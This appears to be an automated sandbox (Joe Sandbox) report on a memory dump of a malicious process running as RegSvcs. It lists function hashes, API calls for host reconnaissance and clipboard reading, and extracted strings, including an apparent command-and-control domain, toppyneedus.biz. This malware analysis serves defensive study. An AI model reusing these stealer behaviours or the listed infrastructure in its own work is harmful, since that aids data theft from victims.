                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b666fbb987b62fcf0699fc58f589be2a90b4373d6f22bea5d9fdb2cd99f7f0c9
                                                                            • Instruction ID: 2bb6e82cb67e82422e72d62c4e81f694db083129b0334858f2dfaa7fd2b32362
                                                                            • Opcode Fuzzy Hash: b666fbb987b62fcf0699fc58f589be2a90b4373d6f22bea5d9fdb2cd99f7f0c9
                                                                            • Instruction Fuzzy Hash: 43B118B66083415FC718CF69C4926AFF7D2ABD5304F188A2EE8D987342D738D945CB86
                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL(00446D6C,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00443ADE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: QPWV
                                                                            • API String ID: 0-1237034553
                                                                            • Opcode ID: a45b21cb5d22bd00ee0d8e213eafbd62e039c6be34689603b219ffec449bb280
                                                                            • Instruction ID: bc9fbc18f579d1fb442f7a1cfedb79b4bbfca8695cb869afd5cf44967252ab31
                                                                            • Opcode Fuzzy Hash: a45b21cb5d22bd00ee0d8e213eafbd62e039c6be34689603b219ffec449bb280
                                                                            • Instruction Fuzzy Hash: CF2106343402006BE7188F289C96BB773A1EB86315F64563DB1A6973E2C6349D5AD748
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ejc`
                                                                            • API String ID: 0-1805570023
                                                                            • Opcode ID: a6ff6403b611b4b3eca8ee70a01ab6f142159734446b99def95ba221e831ee42
                                                                            • Instruction ID: c3c3d6c3edbba0c76da3cc982b1f74b3c2a1742a5cab4f06587e54c6178f03e8
                                                                            • Opcode Fuzzy Hash: a6ff6403b611b4b3eca8ee70a01ab6f142159734446b99def95ba221e831ee42
                                                                            • Instruction Fuzzy Hash: 3E1126752083914BC304CFB5A8946AFBBA6EFD2704F14963CE9C167381C6319A078BCA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2fb0c1e0c8c9a0206f6fb87c980ef27ba1a1daa0ccd8a822f80763afb0d48801
                                                                            • Instruction ID: 87b69505bef963778ae5ab3a8d374906c89afef2df7a5c5756a1b48e747d9d12
                                                                            • Opcode Fuzzy Hash: 2fb0c1e0c8c9a0206f6fb87c980ef27ba1a1daa0ccd8a822f80763afb0d48801
                                                                            • Instruction Fuzzy Hash: DB5125766183118FC7149F24DC5166BB7E1EBC5314F04993DE899EB3A0E738CC058B86

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 706 433209-433215 707 433217-43321f 706->707 708 43322b-433278 FreeLibrary call 4453b0 706->708 709 433220-433229 707->709 714 433280-4332d4 708->714 709->708 709->709 714->714 715 4332d6-4332e0 714->715 716 4332e2-4332e9 715->716 717 4332fd 715->717 718 4332f0-4332f9 716->718 719 433304-43333c GetComputerNameExA 717->719 718->718 720 4332fb 718->720 721 43333d 719->721 720->719 721->721
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?), ref: 00433235
                                                                            • GetComputerNameExA.KERNELBASE(00000006,DCF3E703,00000100), ref: 0043331D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ComputerFreeLibraryName
                                                                            • String ID: GP
                                                                            • API String ID: 2904949787-441890406
                                                                            • Opcode ID: 6563f58ce82020090adf1b72062c6c9ded0c1e7760ea96bc79605ec8a0e8a161
                                                                            • Instruction ID: eddbfa738cb6cfcc30497a27838ad129c4ca1a3f4652ac02fa0e8ba1fa549090
                                                                            • Opcode Fuzzy Hash: 6563f58ce82020090adf1b72062c6c9ded0c1e7760ea96bc79605ec8a0e8a161
                                                                            • Instruction Fuzzy Hash: D831483151C3918BD7298F3D88143ABBBE16B9B305F1486AED4EACB2D1CA3805058743

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 722 433205-433278 FreeLibrary call 4453b0 727 433280-4332d4 722->727 727->727 728 4332d6-4332e0 727->728 729 4332e2-4332e9 728->729 730 4332fd 728->730 731 4332f0-4332f9 729->731 732 433304-43333c GetComputerNameExA 730->732 731->731 733 4332fb 731->733 734 43333d 732->734 733->732 734->734
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?), ref: 00433235
                                                                            • GetComputerNameExA.KERNELBASE(00000006,DCF3E703,00000100), ref: 0043331D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ComputerFreeLibraryName
                                                                            • String ID: GP
                                                                            • API String ID: 2904949787-441890406
                                                                            • Opcode ID: 5e3aaa8e12363f3489ef7afd5d3c2543f2de0a94c8b01c3a683ced23e921a2ff
                                                                            • Instruction ID: be0c8a0e1ba4eb4c98f037dce5614ac2d0245b0477652537ed0c6ed9604a5934
                                                                            • Opcode Fuzzy Hash: 5e3aaa8e12363f3489ef7afd5d3c2543f2de0a94c8b01c3a683ced23e921a2ff
                                                                            • Instruction Fuzzy Hash: CC21383251C3918BD728CF3DC9153ABBBE6ABDA305F14867ED4AACB2D1DA3409058743
                                                                            APIs
                                                                            • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 00433471
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ComputerName
                                                                            • String ID: {fby
                                                                            • API String ID: 3545744682-2939326382
                                                                            • Opcode ID: dfa66e802a065821fa9aa1e5c3edbdd74e76331a6792d7e278193cc6857eefd8
                                                                            • Instruction ID: cc82bf4fbf4fe6b7fec268d5013ea982f577005c8e03e8b80f453caee362647b
                                                                            • Opcode Fuzzy Hash: dfa66e802a065821fa9aa1e5c3edbdd74e76331a6792d7e278193cc6857eefd8
                                                                            • Instruction Fuzzy Hash: CB31593661C7918BDB398F3888A43EBBBD19BDA315F1D466EC4DE87381CB3848018742
                                                                            APIs
                                                                            • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 00433471
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ComputerName
                                                                            • String ID: {fby
                                                                            • API String ID: 3545744682-2939326382
                                                                            • Opcode ID: 7af9c8fd98d14bff63681dd837a83c1179642a7d1f72017eb7558ea3c90a5f9b
                                                                            • Instruction ID: 18ed6c430fb510ef93a7d0f3d5c361979238ae575e65861c39acc9be8d7cf56d
                                                                            • Opcode Fuzzy Hash: 7af9c8fd98d14bff63681dd837a83c1179642a7d1f72017eb7558ea3c90a5f9b
                                                                            • Instruction Fuzzy Hash: CE313977A1C75287DB288F2488553EBB7D29BD9315F2D867ED8DE87381CA3848014742
                                                                            APIs
                                                                            • GetComputerNameExA.KERNELBASE(00000006,DCF3E703,00000100), ref: 0043331D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ComputerName
                                                                            • String ID: GP
                                                                            • API String ID: 3545744682-441890406
                                                                            • Opcode ID: a4808b73a2fc8d2fb5abad4073aaf5fb6a24ddf11398a80de7234b585a83bbe3
                                                                            • Instruction ID: 2a8d1d81090a14569c5c5b7b0629f3557b313ebb2ade440d1236e0acd55b6529
                                                                            • Opcode Fuzzy Hash: a4808b73a2fc8d2fb5abad4073aaf5fb6a24ddf11398a80de7234b585a83bbe3
                                                                            • Instruction Fuzzy Hash: EF21383251C3518BD728CF3DC9143ABBBE6BBDA304F54866ED4AACB2D5DA7405058743
                                                                            APIs
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004126C2
                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004126DA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeSecurity
                                                                            • String ID:
                                                                            • API String ID: 640775948-0
                                                                            • Opcode ID: 10f064ee220c507d915f1d424deb88b62d3e2b18beb6ee73b3b23a48d7d3b2a2
                                                                            • Instruction ID: 2bca720c1f31fde5ceeaedde1984d791ee9f0414cc4c9d79ca1630e3408cefe1
                                                                            • Opcode Fuzzy Hash: 10f064ee220c507d915f1d424deb88b62d3e2b18beb6ee73b3b23a48d7d3b2a2
                                                                            • Instruction Fuzzy Hash: 41F01A797D4701B6F2390770DD2BF5161219785F22F748329F3217D6DC8AE83A08450C
                                                                            APIs
                                                                            • GetUserDefaultUILanguage.KERNELBASE ref: 0043C692
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: DefaultLanguageUser
                                                                            • String ID:
                                                                            • API String ID: 95929093-0
                                                                            • Opcode ID: db9d752f8615cad4a15f39555ff73e6488da311daffc9517e78d12363df8cab4
                                                                            • Instruction ID: 46ed00a226e76ca485e49e74dce33b3c0cde6200119287aafed108d42e9685fd
                                                                            • Opcode Fuzzy Hash: db9d752f8615cad4a15f39555ff73e6488da311daffc9517e78d12363df8cab4
                                                                            • Instruction Fuzzy Hash: D821CD326093818FD704CF78C9C0659BBB26F4A200F4882AED65A9B382CA3489858B51
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00443C09
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ForegroundWindow
                                                                            • String ID:
                                                                            • API String ID: 2020703349-0
                                                                            • Opcode ID: 10b60b6185b2966b14e8877d9f6f24751d04f8d0b9f996907109f6e2cbf72ad3
                                                                            • Instruction ID: 3035aa517afaf49a31d507dae9bbb53c902ec0c13c4d7644fc63a29e793abeac
                                                                            • Opcode Fuzzy Hash: 10b60b6185b2966b14e8877d9f6f24751d04f8d0b9f996907109f6e2cbf72ad3
                                                                            • Instruction Fuzzy Hash: 29F0F4B2A442418BD7089F35DC4595777E1EB96305B18883EE152C6785CA3CD506CB0A
                                                                            APIs
                                                                            • RtlReAllocateHeap.NTDLL(?,00000000,0043F9EF,011C7650,?,011C7650,0043F9EF,00000000,00004000,?,?,?,?,?,011C7650,?), ref: 00443A82
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 650999bfba410ea02efb495c78b9c1864137618d8ac633baae9911caf181d38e
                                                                            • Instruction ID: f90f3096ab9ff0e24ff0c360bcc3477f15b7a842ab67e250a51fee1cdc8694ae
                                                                            • Opcode Fuzzy Hash: 650999bfba410ea02efb495c78b9c1864137618d8ac633baae9911caf181d38e
                                                                            • Instruction Fuzzy Hash: 4BE02B36514210EFD2006F28BC06A1B7668AFC2B65F03043AF805A6125DF38F80A85AE
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: BlanketProxy
                                                                            • String ID:
                                                                            • API String ID: 3890896728-0
                                                                            • Opcode ID: fe8fcd6a7de0a7bfd82206f5bd37363747d380055324accfbb0b2c53c99cd6e3
                                                                            • Instruction ID: d209646a7f178b22ca4a499e8b0929f7de8c74b30a8c66eca02436d4238fab1b
                                                                            • Opcode Fuzzy Hash: fe8fcd6a7de0a7bfd82206f5bd37363747d380055324accfbb0b2c53c99cd6e3
                                                                            • Instruction Fuzzy Hash: 2CF0F9B5209702CFE311CF25C45430BBBE6BBC4314F25891CE4944B355D7B5AA498FC2
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: BlanketProxy
                                                                            • String ID:
                                                                            • API String ID: 3890896728-0
                                                                            • Opcode ID: 1100639bab777f0c826d7f7131cd09f17c370fecf9b368d3c5a73d3e82f56921
                                                                            • Instruction ID: 237b9997d780b682eb02d192c03a67301cef8a3512a355dd374ab3ae68ece661
                                                                            • Opcode Fuzzy Hash: 1100639bab777f0c826d7f7131cd09f17c370fecf9b368d3c5a73d3e82f56921
                                                                            • Instruction Fuzzy Hash: 4AF0B7B46087018FD354DF28D5A875BBBE0FB89304F10881CE1998B3A0CBB5A948CF82
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 00441F87
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 92b34eb2139bae582c8bb60814d446a4ffe07010a516dbaf19fa5f24f72b5b0f
                                                                            • Instruction ID: 1b9f723de01a6b18edca6fa2ea294c1de34edc1f141b251bf60647e38ad909a2
                                                                            • Opcode Fuzzy Hash: 92b34eb2139bae582c8bb60814d446a4ffe07010a516dbaf19fa5f24f72b5b0f
                                                                            • Instruction Fuzzy Hash: 4EE04638149521EFE2102F10FC05B863B68FF42722F5345B5F4006A0B1CB75EC49CAAC
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00443C09
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ForegroundWindow
                                                                            • String ID:
                                                                            • API String ID: 2020703349-0
                                                                            • Opcode ID: f8dbfc7d42a833586f159ef83fb0c895a3deb41def43958a9556e790e9773ae4
                                                                            • Instruction ID: 03eda8b6d88c3f46fdc5f4e9e4c9d9b2bce7e557d8b06ae09e804bafa004143a
                                                                            • Opcode Fuzzy Hash: f8dbfc7d42a833586f159ef83fb0c895a3deb41def43958a9556e790e9773ae4
                                                                            • Instruction Fuzzy Hash: 0BE086BFE50100CFDB04DF20EC4585533A6979A305318C03AD501C3756DA3CD909DB08
                                                                            APIs
                                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 00410CA3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0
                                                                            • Opcode ID: 7a0df7ee779d9150fc1f69970c287c035aa67520edd56c0248f40a1cb9a76a52
                                                                            • Instruction ID: 9bb6d384c18b66abdfac9d4b0a3edc9f0815284333ef8ab565cd4fd848be81d7
                                                                            • Opcode Fuzzy Hash: 7a0df7ee779d9150fc1f69970c287c035aa67520edd56c0248f40a1cb9a76a52
                                                                            • Instruction Fuzzy Hash: 3FD02E24A6414427D308A738EC06F2236A8C743310F40023CE2A282AD2EA10BA00C1AD
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?,?,0040BCF8,8D8CB392), ref: 00441F40
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 24640083b3c92dd8fd3416efdbe967de50b221664e53a3c88201ab9d3cbb992c
                                                                            • Instruction ID: 04df476d3a4a30a0b11cb9cda54afa657f5a0255b1880da6abef3b7b96f20fbf
                                                                            • Opcode Fuzzy Hash: 24640083b3c92dd8fd3416efdbe967de50b221664e53a3c88201ab9d3cbb992c
                                                                            • Instruction Fuzzy Hash: 14C04C31145520AAD5502B15FC05B863A589F45665F420055B544660B58B60AC458698

                                                                            Non-executed Functions

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: toppyneedus.biz$@<F$LB$`<f$h4n$lb$pv$t&j
                                                                            • API String ID: 0-527765425
                                                                            • Opcode ID: f4e12c6e8ebef57f3e61ec21c0144b4b5d912e78b5689123b233584c37339e56
                                                                            • Instruction ID: 8a360df87320b28f0af846fee8f6789f0204339ff80b405b9120d9825fcde571
                                                                            • Opcode Fuzzy Hash: f4e12c6e8ebef57f3e61ec21c0144b4b5d912e78b5689123b233584c37339e56
                                                                            • Instruction Fuzzy Hash: 24B1F4716493908AC738CF28D8957DBBBE1EBD6304F184A6DC1C98B251DB395506CB86
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "$')%$CBA@$CBA@$CBA@$CBA@$CBA@
                                                                            • API String ID: 0-1648101650
                                                                            • Opcode ID: 46aaecc8b2f131669d4b2377408c4b5e807551aac116a28a09c17046ef61fac7
                                                                            • Instruction ID: c7d8c32c1ea3bc9d3ca06de244f7fd2e18d1a2b72d250ad2b2fc751783ea5e9a
                                                                            • Opcode Fuzzy Hash: 46aaecc8b2f131669d4b2377408c4b5e807551aac116a28a09c17046ef61fac7
                                                                            • Instruction Fuzzy Hash: EA224A306483408BE714CF24DC90ABB77E2EB97314F184A6EE0D6972E2D739D849CB59
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                            • String ID:
                                                                            • API String ID: 1494355150-0
                                                                            • Opcode ID: 610b9b8952b8a5d8777d71951a4623dab0033d9899926bb46419a93c0d2a9d37
                                                                            • Instruction ID: 2aa4159dd96cdeebebba7d4a32427aa8825144f67244e270472973ddfa789a16
                                                                            • Opcode Fuzzy Hash: 610b9b8952b8a5d8777d71951a4623dab0033d9899926bb46419a93c0d2a9d37
                                                                            • Instruction Fuzzy Hash: 1B41F1B19087819ED701ABB8D48935EBFE0AB06304F04863ED4D597242D37D9969C7A7
                                                                            APIs
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0042DEB0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStrings
                                                                            • String ID: $B$^_
                                                                            • API String ID: 237503144-1065896459
                                                                            • Opcode ID: b4a2981656cf3cfbe91d38f2c99c8fd1b7ed0dba9e5bf7a956d75277c9e6da75
                                                                            • Instruction ID: 0344e8aaa67ffd347840b96f30da0ecd9f1dd72fda11c18e10c18fabe79d5b3d
                                                                            • Opcode Fuzzy Hash: b4a2981656cf3cfbe91d38f2c99c8fd1b7ed0dba9e5bf7a956d75277c9e6da75
                                                                            • Instruction Fuzzy Hash: B98128B6A083548FD3209F65EC4171BB7E4EB81700F55483EFA859B391D775E8058B8A
                                                                            APIs
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0042DEB0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStrings
                                                                            • String ID: $B$^_
                                                                            • API String ID: 237503144-1065896459
                                                                            • Opcode ID: 50ed3bd5ecb2cf208b41fee959d6fd7cd019dbdb41b47a47620f62b5378ff76e
                                                                            • Instruction ID: b0e1f91757fefada2993b1d55529f538c6b68662bf8ac0ebdc22514e80bb102d
                                                                            • Opcode Fuzzy Hash: 50ed3bd5ecb2cf208b41fee959d6fd7cd019dbdb41b47a47620f62b5378ff76e
                                                                            • Instruction Fuzzy Hash: C58115B6A083648FD3209F65EC4172BB7E4EBC1700F55483EFA849B391D7B5D8058B8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 7O,I$:_*Y$>C>M$rs
                                                                            • API String ID: 0-576127746
                                                                            • Opcode ID: 3e995968805d99ce1be606f3189a8722b0aee25908a2768e8e569c834aed2b5d
                                                                            • Instruction ID: d2d28a0d22742d62602b9f5d7d09ae3aae0658e4685df3f4044542c05c8ab9fe
                                                                            • Opcode Fuzzy Hash: 3e995968805d99ce1be606f3189a8722b0aee25908a2768e8e569c834aed2b5d
                                                                            • Instruction Fuzzy Hash: 3F712474608340DFE324CF14E841BABB7E5FB86308F00497EF5958B291DB799906CB8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 67$CBA@$LINO$LINO$XnQl$e&%v
                                                                            • API String ID: 0-1626510912
                                                                            • Opcode ID: 08f4ff5a98f8ec89c17a5fa7254d2efca40d336810880bafb4430d43bf034da7
                                                                            • Instruction ID: f980bed176c975048af8b90f0d6393272cec3849d108c1304d2540599a080c88
                                                                            • Opcode Fuzzy Hash: 08f4ff5a98f8ec89c17a5fa7254d2efca40d336810880bafb4430d43bf034da7
                                                                            • Instruction Fuzzy Hash: 06D11376A083228BD714CF28D84166BB3E2FF95314F99893DE9D5973A0D3389816CB47
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,q s$1y){$E{fq$Q$rSmP$~S}M
                                                                            • API String ID: 0-2467998722
                                                                            • Opcode ID: e2e7305b278bef76be5cfc8f166a118385c7b5f3fc88ae42b92a7638cdca48e3
                                                                            • Instruction ID: 9c8e4458fea8042078e14fd034d54d7afe9e2ab44ccea54964b7e50537dd0d18
                                                                            • Opcode Fuzzy Hash: e2e7305b278bef76be5cfc8f166a118385c7b5f3fc88ae42b92a7638cdca48e3
                                                                            • Instruction Fuzzy Hash: 92E124B5A083448FD324DF65E84175BB7E1EBC2314F19893DD9C88B352EB788905CB96
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .s7~$.s7~$2s7~$2s7~$m>?<$~2~0
                                                                            • API String ID: 0-157436929
                                                                            • Opcode ID: 111419f3ea66b03adb7975a0b13bd761fb6ca659aa16d2f438d34e8c7d5d8daf
                                                                            • Instruction ID: 451fd16b63d0f74c54ee9b70303af4a5cf906298ad430e951b8fb830de79242d
                                                                            • Opcode Fuzzy Hash: 111419f3ea66b03adb7975a0b13bd761fb6ca659aa16d2f438d34e8c7d5d8daf
                                                                            • Instruction Fuzzy Hash: D361AF7A604601CFD3248F7ADC81617B7F2FB8A302B16497DE85AC3A61DB34E5158B48
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: !$8CpA$8CpA$RCpA$RCpA$57
                                                                            • API String ID: 0-1597130363
